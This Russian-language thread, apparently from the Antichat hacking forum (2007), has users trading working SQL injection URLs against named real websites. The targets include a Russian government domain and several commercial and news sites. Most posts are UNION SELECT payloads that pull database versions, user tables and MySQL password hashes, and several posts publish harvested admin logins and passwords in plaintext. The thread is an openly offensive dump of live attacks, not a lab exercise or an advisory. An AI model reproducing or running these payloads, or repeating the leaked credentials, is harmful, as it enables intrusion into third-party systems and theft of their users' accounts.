ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.04.2007, 08:55
Аватар для Joker-jar
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию

Цитата:
http://comedy.perm.ru/main/index.html?pg=7&nid=-1+union+select+1,2,3,version(),5,6,7/*
Мышка, ****, норушка (с) Галыгин.

P.S. Ничего интересного по части таблиц так и не нашел...
 
Ответить с цитированием

sql-inj
  #2  
Старый 14.04.2007, 09:51
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql-inj

Сайт: http://www.audiobookz.ru/
уязвимость: http://www.audiobookz.ru/show_r.php?r=1'
подобранные таблицы: users
подобранные поля: login,pas,uid,name
Цитата:
http://www.audiobookz.ru/show_r.php?r=1+union+select+concat_ws(0x3a,uid,nam e,login,pas)+from+users/*
есть админка http://www.audiobookz.ru/admin/ , но не пашет.
 
Ответить с цитированием

cont
  #3  
Старый 14.04.2007, 10:19
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
По умолчанию cont

comedy
Цитата:
Сообщение от Joker-jar  
Мышка, ****, норушка (с) Галыгин.

P.S. Ничего интересного по части таблиц так и не нашел...
Нашел таблицы news, ibf_members, ibf_admin_sessions и т.д. но походу ibf_* не от того форума, который действует на сайте.

Цитата:
http://comedy.perm.ru/main/index.html?pg=7&nid=-1+union+select+1,2,3,concat_ws(0x3a,id,name,passwo rd,email,ip_address),5,6,7+from+ibf_members+limit+ 1,1/*

Последний раз редактировалось Серенький; 14.04.2007 в 10:21..
 
Ответить с цитированием

  #4  
Старый 14.04.2007, 10:09
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


Cool

www.equipnet.ru
Код:
http://www.equipnet.ru/show_firm.php?firm_id=-23638+union+select+concat(convert(version()+using+cp1251),char(59),database(),char(59),user())/*

Последний раз редактировалось Isis; 14.04.2007 в 10:31..
 
Ответить с цитированием

  #5  
Старый 14.04.2007, 10:32
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


Cool

www.photodom.com
Код:
http://www.photodom.com/mypage.php?nick=Font'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,user(),database(),22,23,24,25,26,27,28,29/*
www.coffeeblues.ru
Код:
http://www.coffeeblues.ru/news/index.php3?id=-31+union+select+1,2,concat(database(),char(58,58),user(),char(58,58),version()),4,5,6,7,8,9,10,11,12/*
www.super.com.ua
Код:
http://www.super.com.ua/local/plug-in/a-price/showone.php?groupid=65&id=-21096+union+select+1,2,3,4,5,6,7,8,9,concat(database(),char(58,58),user(),char(58,58),version()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

Последний раз редактировалось Isis; 14.04.2007 в 10:56..
 
Ответить с цитированием

  #6  
Старый 14.04.2007, 13:00
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

apelsinclub.ru
Код:
http://www.apelsinclub.ru/show.php?event=-1+union+select+1,2,3,concat(nick,0x3a,pwd),5,6,7+from+users/*
pwd=email в форме логина.
пароли в чистом виде
admin:uuu
 
Ответить с цитированием

  #7  
Старый 14.04.2007, 13:07
Аватар для fYt
fYt
Познающий
Регистрация: 11.01.2007
Сообщений: 82
Провел на форуме:
592893

Репутация: 108
По умолчанию

http://www.dukemednews.org/news/article.php?id=6041111+union+select+1,2,password,u ser,5,6+from+mysql.user/*
//---
http://www.fondsk.ru/article.php?id=63900+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21+from+author/*
не до конца=)
 
Ответить с цитированием

  #8  
Старый 14.04.2007, 15:07
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Тут все просто в шоколаде =)
Код:
http://www.flugzeugbilder.de/show.php?id=999999+union+select+1,2,3,database(),5,user,user(),version(),password,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*
Тут не очень =\

Код:
http://www.cssbeauty.com/jobs/show.php?id=374+union+select+convert(concat_ws(char(58,58,58),version(),user(),database())+using+latin1)/*
Код:
http://www.ihrc.org.uk/show.php?id=-1740+union+select+1,2,version(),4,5,6,user(),database(),9,10,11,12,13/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #9  
Старый 14.04.2007, 15:43
Аватар для KPOT_f!nd
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://www.domkino.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(user(),char(58),password),11,12+from+user/*
domkinospbru:ahin
Код:
http://www.fondsk.ru/article.php?id=-641+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+article/*
http://www.flirtanica.ru/articles1.php?id=-18+union+select+1,concat(version(),char(58),database()),3,4,user()+from+articles/*
http://www.domkino.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(user(),char(58),password),11,12+from+user/*
http://www.ollo.su/damp_phpforum/viewmsg.php?msg_id=-402+union+select+1,user(),3,database(),5,version()/*
Код:
http://www.rosprom.gov.ru/documents.php?id=-69+union+select1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*
тишина . . . .если кто нибудь подберет колонки отпишитесь . . .
 
Ответить с цитированием

  #10  
Старый 14.04.2007, 17:36
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

www.uragan.ru

URAGAN - сайты дешево, быстро и качественно

Код:
http://www.uragan.ru/main/txt.php?textid=howzakaz&menu=-6+union+select+1,concat(name,char(58),pass),3,4,5,6+from+users/*&submenu=33
Uragan:zxcvb9

Dialog:umnica11123
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ